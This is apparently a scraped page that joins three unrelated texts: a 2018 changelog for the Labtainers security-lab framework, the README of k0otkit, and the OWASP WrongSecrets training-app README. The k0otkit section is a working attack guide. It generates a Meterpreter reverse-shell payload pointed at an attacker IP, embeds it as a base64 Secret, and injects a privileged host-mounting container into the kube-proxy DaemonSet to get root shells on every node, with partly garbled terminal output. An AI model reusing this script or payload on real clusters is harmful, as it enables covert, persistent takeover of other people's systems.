July 30, 2018

  • Document need to unblock the waitparam.service (by creating flag directory) if a fixlocal.sh script is to start a service for which waitparam is a prerequisite.
  • Add plc-app lab for PLC application firewall and whitelisting exercise.

July 25, 2018

  • Add string_contains operator to goals processing
  • Modify assessment of formatstring lab to account for leaked secret not always being at the end of the displayed string.

July 24, 2018

  • Add SSH Agent lab (ssh-agent)

July 20, 2018

  • Support offline building, optionally skip all image pulling
  • Restore apt/yum repo restoration to Dockerfile templates.
  • Handle redirect URL's from Docker registry blob retrieval to avoid authentication errors (Do not rely on curl --location).

July 12, 2018

  • Add prestop feature to allow execution of designer-specified scripts on selected components prior to lab shutdown.
  • Correct host naming in the ssl lab, it was breaking automated assessment.
  • Fix dmz-lab initial state to permit DNS resolutions from inner network.
  • FILE\REGEX processing was not properly handling multiline searches.
  • Framework version derived from newly rebuilt images had incorrect default value.

July 10, 2018

  • Add an LDAP lab
  • Complete transition to systemd based Ubuntu images, remove unused files
  • Move lab_sys tar file to per-container tmp directory for concurrency.

July 6, 2018

  • All Ubuntu base images replaced with versions based on systemd
  • Labtainer container images in registry now tagged with base image ID & have labels reflecting the base image.
  • A given installation will pull and use images that are consistent with the base images it possesses.
  • If you are using a VM image, you may want to replace that with a newer VM image from our website.
  • New labs will not run without downloading newer base images; which can lead to your VM storing multiple versions of large base images (> 500 MB each).
  • Was losing artifacts from processes that were running when lab was stopped -- was not properly killing capinout processes.

June 27, 2018

  • Add support for Ubuntu systemd images
  • Remove old copy of SimLab.py from labtainer-student/bin
  • Move apt and yum sources to /var/tmp
  • Clarify differences between use of "boolean" and "count_greater" in assessments
  • Extend Add-HOST in start.config to include all components on a network.
  • Add option to new_lab_setup.py to add a container based on a copy of an existing container.

June 21, 2018

  • Set DISPLAY env for root
  • Fix to build dependency handling of svn status output
  • Add radius lab
  • Bug in SimLab append corrected
  • Use svn, where appropriate, to change file names with new_lab_setup.py

June 19, 2018

  • Retain order of containers defined in start.conf when creating terminal with multiple tabs
  • Clarify designer manual to identify path to assessment configuration files.
  • Remove prompt for instructor to provide email
  • Botched error checking when testing for version number
  • Include timestamps of lab starts and redos in the assessment json
  • Add an SSL lab that includes bi-directional authentication and creation of certificates.

June 14, 2018

  • Add diagnostics to parameterizing, track down why some install seem to fail on that.
  • If a container is already created, make sure it is parameterized, otherwise bail to avoid corrupt or half-baked containers.
  • Fix program version number to use svn HEAD

June 15, 2018

  • Convert plain text instructions that appeared in xterms into pdf file.
  • Fix bug in version handling of images that have not yet been pulled.
  • Detect occurance of a container that was created, but not parameterized, and prompt the user to restart the lab with the "-r" option.
  • Add designer utility: rm_svn.py so that removed files trigger an image rebuild.

June 13, 2018

  • Install xterm on Ubuntu 18 systems
  • Work around breakage in new versions of gnome-terminal tab handling

June 11, 2018

  • Add version checking to compare images to the framework.
  • Clarify various lab manuals

June 2, 2018

  • When installing on Ubuntu 18, use docker.io instead of docker-ce
  • The capinout caused a crash when a "sudo su" monitored command is followed by a non-elevated user command.
  • Move routing and resolv.conf settings into /etc/rc.local instead of fixlocal.sh so they persist across start/stop of the containers.

May 31, 2018

  • Work around Docker bug that caused text to wrap in a terminal without a line feed.
  • Extend COMMAND_COUNT to account for pipes
  • Create new version of backups lab that includes backups to a remote server and backs up an entire partition.
  • Alter sshlab instructions to use ssh-copy-id utility
  • Delte /run/nologin file from parameterize.sh to permit ssh login on CentOS

May 30, 2018

  • Extended new_lab_setup.py to permit identification of the base image to use
  • Create new version of centos-log that includes centralized logging.
  • Assessment validation was not accepting "time_not_during" option.
  • Begin to integrate Labtainer Master for managing Labtainers from a Docker container.

May 25, 2018

  • Remove 10 second sleeps from various services. Was delaying xinetd responses, breaking automated tests.
  • Fix snort lab grading to only require "CONFIDENTIAL" in the alarm. Remove unused files from lab.
  • Program finish times were not recorded if the program was running when the lab was stopped.

May 21, 2018

  • Fix retlibc grading to remove duplicate goal, was failing automated assessment
  • Remove copies of mynotify.py from individual labs and lab template, it is has been part of lab_sys/sbin, but had not been updated to reflect fixes made for acl lab.

May 18, 2018

  • Mask signal message from exec_wrap so that segv error message looks right.
  • The capinout was sometimes losing stdout, check command stdout on death of cmd.
  • Fix grading of formatstring to catch segmentation fault message.
  • Add type_function feature to SimLab to type stdout of a script (see formatstring simlab).
  • Remove SimLab limitation on combining single/double quotes.
  • Add window_wait directive to SimLab to pause until window with given title can be found.
  • Modify plc lab to alter titles on physical world terminal to reflect status, this also makes testing easier.
  • Fix bufoverflow lab manual link.

May 15, 2018

  • Add appendix on use of the SimLab tool to simulate user performance of labs for regression testing and lab development.
  • Add wait_net function to SimLab to pause until selected network connections terminate.
  • Change acl automated assessment to use FILE_REGEX for multiline matching.
  • SimLab test for xsite lab.

May 11, 2018

  • Add "noskip" file to force collection of files otherwise found in home.tar, needed for retrieving Firefox places.sqlite.
  • Merge sqlite database with write ahead buffer before extracting.
  • Corrections to lab manual for the symkeylab
  • Grading additions for symkeylab and pubkey
  • Improvements to simlab tool: support include, fix window naming.

May 9, 2018

  • Fix parameterization of the file-deletion lab. Correct error its lab manual.
  • Replace use of shell=True in python scripts to reduce processes and allow tracking PIDs
  • Clean up manuals for backups, pass-crack and macs-hash.

May 8, 2018

  • Handle race condition to prevent gnome-terminal from executing its docker command before an xterm instruction terminal runs its command.
  • Don't display errors when instuctor stops a lab started with "-d".
  • Change grading of nmap-ssh to better reflect intent of the lab.
  • Several document and script fixes suggested by olberger on github.

May 7, 2018

  • Use C-based capinout program instead of the old capinout.sh to capture stdin and stdout. See trunk/src-tool/capinout. Removes limitations associated with use ctrl-C to break monitored programs and the display of passwords in telnet and ssh.
  • Include support for saki bulk_download zip processing to extract seperatly submitted reports, and summarizes missing submits.
  • Add checks to user-provided email to ensure they are printable characters.
  • While grading, if user-supplied email does not match zip file name, proceed to grade the results, but include note in the table reflecting cheating. Require to recover from cases where student enters garbage for an email address.
  • Change telnetlab grading to not look at tcpdump output for passwords -- capinout fix leads to correct character-at-a-time transmission to server.
  • Fix typo in install-docker.sh and use sudo to alter docker dns setting in that script.

April 26, 2018

  • Transition to use of "labtainer" to start lab, and "stoplab" to stop it.
  • Add --version option to labtainer command.
  • Add log_ts and log_range result types, and time_not_during goal operators. Revamp the centos-log and sys-log grading to use these features.
  • Put labsys.tar into /var/tmp instead of /tmp, sometimes would get deleted before expanded
  • Running X applications as root fails after reboot of VM.
  • Add "User Command" man pages to CentOS based labs
  • Fix recent bug that prevented collection of docs files from students
  • Modify smoke-tests to only compare student-specific result line, void of whitespace

April 20, 2018

  • The denyhosts service fails to start the first time, moved start to student_startup.sh.
  • Move all faux_init services until after parameterization -- rsyslog was failing to start on second boot of container. April 19, 2018
  • The acl lab failed to properly assess performance of the trojan horse step.
  • Collect student documents by default.
  • The denyhost lab changed to reflect that denyhosts (or tcp wrappers?) now modifies iptables. Also, the denyhosts service was failing to start on some occasions.
  • When updating Labtainers, do not overwrite files that are newer than those in the archive -- preserve student lab reports.

April 12, 2018

  • Add documentation for the purpose of lab goals, and display this for the instructor when the instructor starts a lab.
  • Correct use of the precheck function when the program is in treataslocal, pass capintout.sh the full program path.
  • Copy instr_config files at run time rather than during image build.
  • Add Designer Guide section on debugging automated assessment.
  • Incorrect case in lab report file names.
  • Unncessary chown function caused instructor.py to sometimes crash.
  • Support for automated testing of labs (see SimLab and smoketest).
  • Move testsets and distrib under trunk

April 5, 2018

  • Revise Firefox profile to remove "you've not use firefox in a while..." message.
  • Remove unnessary pulls from registry -- get image dates via docker hub API instead.

March 28, 2018

  • Use explicit tar instead of "docker cp" for system files (Docker does not follow links.)
  • Fix backups lab use separate file system and update the manual.

March 26, 2018

  • Support for multi-user modes (see Lab Designer User Guide).
  • Removed build dependency on the lab_bin and lab_sys files. Those are now copied during parameterization of the lab.
  • Move capinout.sh to /sbin so it can be found when running as root.

March 21, 2018

  • Add CLONE to permit multiple instances of the same container, e.g., for labs shared by multiple concurrent students.
  • Adapt kali-test lab to provide example of macvlan and CLONE
  • Copy the capinout.sh script to /sbin so root can find it after a sudo su.

March 15, 2018

  • Support macvlan networks for communications with external hosts
  • Add a Kali linux base, and a Metasploitable 2 image (see kali-test)

March 8, 2018

  • Do not require labname when using stop.py
  • Catch errors caused by stray networks and advise user on a fix
  • Add support for use of local apt & yum repos at NPS

February 21, 2018

  • Add dmz-lab
  • Change "checklocal" to "precheck", reflecting it runs prior to the command.
  • Decouple inotify event reporting from use of precheck.sh, allow inotify event lists to include optional outputfile name.
  • Extend bash hook to root operations, flush that bash_history.
  • Allow parameterization of start.config fields, e.g., for random IP addresses
  • Support monitoring of services started via systemctl or /etc/init.d
  • Introduce time delimeter qualifiers to organize a timestamped log file into ranges delimited by some configuration change of interest (see dmz-lab)

February 5, 2018

  • Boolean values from results.config files are now treated as goal values
  • Add regular expression support for identifying artifact results.
  • Support for alternate Docker registries, including a local test registry for testing
  • Msc fixes to labs and lab manuals
  • The capinout monitoring hook was not killing child processes on exit.
  • Kill monitored processes before collecting artifacts
  • Add labtainer.wireshark as a baseline container, clean up dockerfiles

January 30, 2018

  • Add snort lab
  • Integrate log file timestamps, e.g., from syslogs, into timestamped results.
  • Remove undefined result values from intermediate timestamped json result files.
  • Alter the time_during goal assessment operation to associate timestamps with the resulting goal value.

January 24, 2018

  • Use of tabbed windows caused instructor side to fail, use of double quotes.
  • Ignore files in _tar directories (other than .tar) when determining build dependencies.


K0Otkit - Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters


k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell).

k0otkit is the combination of Kubernetes and rootkit.

Prerequisite:

k0otkit is a post-penetration tool, so you have to firstly conquer a cluster, somehow manage to escape from the container and get the root privilege of the master node (to be exact, you should get the admin privilege of the target Kubernetes).

Scenario:

  1. After Web penetration, you get a shell of the target.
  2. If necessary, you manage to escalate the privilege and make it.
  3. You find the target environment is a container (Pod) in a Kubernetes cluster.
  4. You manage to escape from the container and make it (with CVE-2016-5195, CVE-2019-5736, docker.sock or other techniques).
  5. You get a root shell of the master node and are able to instruct the cluster with kubectl on the master node as admin.
  6. Now you want to control all the nodes in the cluster as quickly as possible. Here comes k0otkit!

k0otkit is detailed in k0otkit: Hack K8s in a K8s Way.


Usage

Make sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the kubectl command in k0otkit_template.sh to use the token or certification.)

Make sure you have installed Metasploit on your attacker host (msfvenom and msfconsole should be available).

Deploy k0otkit

Clone this repository:

git clone https://github.com/brant-ruan/k0otkit
cd k0otkit/
chmod +x ./*.sh

Replace the attacker's IP and port in pre_exp.sh with your own IP and port:

ATTACKER_IP=192.168.1.107
ATTACKER_PORT=4444

Generate k0otkit:

./pre_exp.sh

k0otkit.sh will be generated. Then run the reverse shell handler:

./handle_multi_reverse_shell.sh

Once the handler is ready, copy the content of k0otkit.sh and paste it into your shell on the master node of the target Kubernetes, then press <Enter> to execute it.

Wait a moment and enjoy reverse shells from all nodes :)

P.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit.

Interact with Shells

After the successful deployment of k0otkit, you can interact with any reverse shell as you want:

# within msfconsole
sessions 1

Features

  • utilize K8s resources and features (hack K8s in a K8s way)
  • dynamic container injection
  • communication encryption (thanks to Meterpreter)
  • fileless

Example

Generate k0otkit:

kali@kali:~/k0otkit$ ./pre_exp.sh
+ ATTACKER_IP=192.168.1.107
+ ATTACKER_PORT=4444
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt
++ xxd -p mrt
++ tr -d '\n'
++ base64 -w 0
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAx MDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh

Run the reverse shell handler:

kali@kali:~/k0otkit$ ./handle_multi_reverse_shell.sh
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444
msf5 exploit(multi/handler) >

Copy the content of k0otkit.sh into your shell on the master node of the target Kubernetes and press <Enter>:

kali@kali:~$ nc -lvnp 10000
listening on [any] 10000 ...
connect to [192.168.1.107] from (UNKNOWN) [192.168.1.106] 48750
root@victim-2:~# volume_name=cache

mount_path=/var/kube-proxy-cache

ctr_name=kube-proxy-cache

binary_file=/usr/local/bin/kube-proxy-cache

payload_name=cache

secret_name=proxy-cache

secret_data_name=content

ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')

volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')

image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')

# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metad ata:
name: $secret_name
namespace:volume_name=cache
root@victim-2:~#
root@victim-2:~# mount_path=/var/kube-p kube-system
type: Opaque
data:
$secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
EOF

# assume that ctr_line_num < volume_line_num
# otherwise you should switch the two sed commands below

# inject malicious container into kube-proxy pod
kubecroxy-cache
root@victim-2:~#
root@victim-2:~# ctr_n ame=kube-proxy-cache
root@victim-2:~#
root@victim-2:~# binary_file=/usr/local/bin/kube-proxy-cache
root@victim-2:~#
root@victim-2:~# payload_name=cache
root@victim-2:~#
root@victim-2:~# secret_name=proxy-cache
root@victim-2:~#
root@victim-2:~# secret_data_name=content
root@victim-2:~#
root@victim-2:~# ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-tl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
| sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n hostPath:\n path: /\n type: Directory\n" \
| sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n image: $image\n imagePullPolicy: IfNotPresent\n command: [\"sh\"]\n args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <ST DIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n env:\n - name: $payload_name\n valueFrom:\n secretKeyRef:\n pr name: $secret_name\n key: $secret_data_name\n securityContext:\n privileged: true\n volumeMounts:\n - mountPath: $mount_path\n name: $volume_name" \
containers:/{print NR}')oxy -o yaml | awk '/

root@victim-2:~#
root@victim-2:~# volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
root@victim-2:~#
root@victim-2:~# image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
root@victim-2:~#
root@victim-2:~# # create payload secret
root@victim-2:~# cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
> apiVersion: v1
> kind: Secret
> metadata:
> name: $secret_name
> namespace: kube-system
> type: Opaque
> data:
> $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
> EOF
secret/proxy-cache created
root@victim-2:~#
root@victim-2:~# # assume that ctr_line_num < volume_line_num
root@victim-2:~# # otherwise you should switch the two sed commands below
root@victim-2:~#
root@vict im-2:~# # inject malicious container into kube-proxy pod
root@victim-2:~# kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
> | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n hostPath:\n path: /\n type: Directory\n" \
> | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n image: $image\n imagePullPolicy: IfNotPresent\n command: [\"sh\"]\n args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n env:\n - name: $payload_name\n valueFrom:\n secretKeyRef:\n name: $secret_name\n key: $secret_data_name\n securityContext:\n privileged: true\ n volumeMounts:\n - mountPath: $mount_path\n name: $volume_name" \
> | kubectl replace -f -
daemonset.extensions/kube-proxy replaced

Wait for reverse shells:

msf5 exploit(multi/handler) > [*] Sending stage (985320 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.107:4444 -> 192.168.1.106:51610) at 2020-11-30 03:30:18 -0500

msf5 exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.168.1.106 192.168.1.107:4444 -> 192.168.1.106:51610 (192.168.1.106)

Function 1 Exit & Re-connect:

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9 created.
Channel 1 created.
whoami
root
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.106 - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/handler) >
[*] Sending stage (985320 bytes) to 192.168.1.106
[*] Meterpreter session 2 opened (192.168.1.107:4444 -> 192.168.1.106:52292) at 2020-11-30 03:32:25 -0500

Function 2 Escape to & Control Node:

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > cd /var/kube-proxy-cache
meterpreter > ls
Listing: /var/kube-proxy-cache
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-03-03 03:21:08 -0500 bin
40755/rwxr-xr-x 4096 dir 2020-03-05 22:23:56 -0500 boot
40755/rwxr-xr-x 4180 dir 2020-04-09 21:32:10 -0400 dev
40755/rwxr-xr-x 4096 dir 2020-04-17 02:31:15 -0400 etc
40755/rwxr-xr-x 4096 dir 2020-03-03 03:00:00 -0500 home
100644/rw-r--r-- 36257923 fil 2020-03-05 22:23:56 -0500 initrd.img
100644/rw-r--r-- 39829184 fil 2020-03-03 03:00:17 -0500 initrd.img.old
40755/rwxr-xr-x 4096 dir 2020-04-16 03:52:46 -0400 lib
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 lib64
40700/rwx------ 16384 dir 2020-03-03 02:33:19 -0500 lost+found
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:29 -0500 media
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 mnt
40755/rwxr-xr-x 4096 dir 2020-04-16 03:59:01 -0400 opt
40555/r-xr-xr-x 0 dir 2020-04-09 21:32:01 -0400 proc
40700/rwx------ 4096 dir 2020-11-30 04:00:05 -0500 root
40755/rwxr-xr-x 1020 dir 2020-11-30 04:04:59 -0500 run
40755/rwxr-xr-x 12288 dir 2020-04-16 03:52:46 -0400 sbin
40755/rwxr-xr-x 4096 dir 2020-03-03 03:02:37 -0500 snap
40755/rwxr-xr-x 4096 dir 2020-03-03 02:33:23 -0500 srv
40555/r-xr-xr-x 0 dir 2020-04-14 22:51:06 -0400 sys
41777/rwxrwxrwx 4096 dir 2020-11-30 04:10:07 -0500 tmp
40755/rwxr-xr-x 4096 dir 2020-04-16 04:42:54 -0400 usr
40755/rwxr-xr-x 4096 dir 2020-03-03 02:5 1:25 -0500 var
100600/rw------- 6712336 fil 2020-03-05 22:22:58 -0500 vmlinuz
100600/rw------- 7184032 fil 2020-03-03 02:33:55 -0500 vmlinuz.old


Wrongsecrets - Examples With How To Not Use Secrets


Welcome to the OWASP WrongSecrets p0wnable app. With this app, we have packed various ways of how to not store your secrets. These can help you to realize whether your secret management is ok. The challenge is to find all the different secrets by means of various tools and techniques.

Can you solve all the 16 challenges?Β 


Support

Need support? Contact us via OWASP Slack for which you sign up here, file a PR, file an issue , or use discussions. Please note that this is an OWASP volunteer based project, so it might take a little while before we respond.

Basic docker exercises

Can be used for challenges 1-4, 8, 12-15

For the basic docker exercises you currently require:

You can install it by doing:

docker run -p 8080:8080 jeroenwillemsen/wrongsecrets:1.4.0-no-vault

Now you can try to find the secrets by means of solving the challenge offered at:

Note that these challenges are still very basic, and so are their explanations. Feel free to file a PR to make them look better ;-).

Running these on Heroku

You can test them out at https://wrongsecrets.herokuapp.com/ as well! But please understand that we have NO guarantees that this works. Given we run in Heroku free-tier, please do not fuzz and/or try to bring it down: you would be spoiling it for others that want to testdrive it.

Deploying the app under your own heroku account

  1. Sign up to Heroku and log in to your account
  2. Click the button below and follow the instructions

Basic K8s exercise

Can be used for challenges 1-6, 8, 12-16

Minikube based

Make sure you have the following installed:

The K8S setup currently is based on using Minikube for local fun:

    minikube start
kubectl apply -f k8s/secrets-config.yml
kubectl apply -f k8s/secrets-secret.yml
kubectl apply -f k8s/secret-challenge-deployment.yml
while [[ $(kubectl get pods -l app=secret-challenge -o 'jsonpath={..status.conditions[?(@.type=="Ready")].status}') != "True" ]]; do echo "waiting for secret-challenge" && sleep 2; done
kubectl expose deployment secret-challenge --type=LoadBalancer --port=8080
minikube service secret-challenge

now you can use the provided IP address and port to further play with the K8s variant (instead of localhost).

k8s based

Want to run vanilla on your own k8s? Use the commands below:

    kubectl apply -f k8s/secrets-config.yml
kubectl apply -f k8s/secrets-secret.yml
kubectl apply -f k8s/secret-challenge-deployment.yml
while [[ $(kubectl get pods -l app=secret-challenge -o 'jsonpath={..status.conditions[?(@.type=="Ready")].status}') != "True" ]]; do echo "waiting for secret-challenge" && sleep 2; done
kubectl port-forward \
$(kubectl get pod -l app=secret-challenge -o jsonpath="{.items[0].metadata.name}") \
8080:8080

now you can use the provided IP address and port to further play with the K8s variant (instead of localhost).

Vault exercises with minikube

Can be used for challenges 1-8, 12-16 Make sure you have the following installed:

Run ./k8s-vault-minkube-start.sh, when the script is done, then the challenges will wait for you at http://localhost:8080 . This will allow you to run challenges 1-8, 12-15.

When you stopped the k8s-vault-minikube-start.sh script and want to resume the port forward run: k8s-vault-minikube-resume.sh. This is because if you run the start script again it will replace the secret in the vault and not update the secret-challenge application with the new secret.

Cloud Challenges

Can be used for challenges 1-16

READ THIS: Given that the exercises below contain IAM privilege escalation exercises, never run this on an account which is related to your production environment or can influence your account-over-arching resources.

Running WrongSecrets in AWS

Follow the steps in the README in the AWS subfolder.

Running WrongSecrets in GCP

Follow the steps in the README in the GCP subfolder.

Running WrongSecrets in Azure

Follow the steps in the README in the Azure subfolder.

Running Challenge15 in your own cloud only

When you want to include your own Canarytokens for your cloud-deployment, do the following:

  1. Fork the project.
  2. Make sure you use the GCP ingress or AWS ingress scripts to generate an ingress for your project.
  3. Go to canarytokens.org and select AWS Keys, in the webHook URL field add <your-domain-created-at-step1>/canaries/tokencallback.
  4. Encrypt the received credentials so that Challenge15 can decrypt them again.
  5. Commit the unencrypted and encrypted materials to Git and then commit again without the decrypted materials.
  6. Adapt the hints of Challenge 15 in your fork to point to your fork.
  7. Create a container and push it to your registry
  8. Override the K8s definition files for either AWS or GCP.

Do you want to play without guidance?

Each challenge has a Show hints button and a What's wrong? button. These buttons help to simplify the challenges and give explanation to the reader. Though, the explanations can spoil the fun if you want to do this as a hacking exercise. Therefore, you can manipulate them by overriding the following settings in your env:

  • hints_enabled=false will turn off the Show hints button.
  • reason_enabled=false will turn of the What's wrong? explanation button.

Special thanks & Contributors

Leaders:

Top contributors:

Testers:

Special mentions for helping out:

Help Wanted

You can help us by the following methods:

  • Star us
  • Share this app with others
  • Of course, we can always use your help to get more flavors of "wrongly" configured secrets in to spread awareness! We would love to get some help with other cloudproiders, like Alibabaor Tencent cloud for instance. Do you miss something else than a cloud provider as an example? File an issue or create a PR! See our guide on contributing for more details. Contributors will be listed in releases, in the "Special thanks & Contributors"-section, and the web-app.

Use OWASP WrongSecrets as a secret detection benchmark

As tons of secret detection tools are coming up for both Docker and Git, we are creating a Benchmark testbed for it. Want to know if your tool detects everything? We will keep track of the embedded secrets in this issue and have a branch in which we put additional secrets for your tool to detect. The branch will contain a Docker container generation script using which you can eventually test your container secret scanning.

Notes on development

For development on local machine use the local profile ./mvnw spring-boot:run -Dspring-boot.run.profiles=local

If you want to test against vault without K8s: start vault locally with

 export VAULT_ADDR='http://127.0.0.1:8200'
export VAULT_API_ADDR='http://127.0.0.1:8200'
vault server -dev

and in your next terminal, do (with the token from the previous commands):

export VAULT_ADDR='http://127.0.0.1:8200'
export VAULT_TOKEN='<TOKENHERE>'
vault token create -id="00000000-0000-0000-0000-000000000000" -policy="root"
vault kv put secret/secret-challenge vaultpassword.password="$(openssl rand -base64 16)"

Now use the local-vault profile to do your development.

./mvnw spring-boot:run -Dspring-boot.run.profiles=local,local-vault

If you want to dev without a Vault instance, use additionally the without-vault profile to do your development:

./mvnw spring-boot:run -Dspring-boot.run.profiles=local,without-vault

Want to push a container? See .github/scripts/docker-create-and-push.sh for a script that generates and pushes all containers. Do not forget to rebuild the app before composing the container

Dependency management

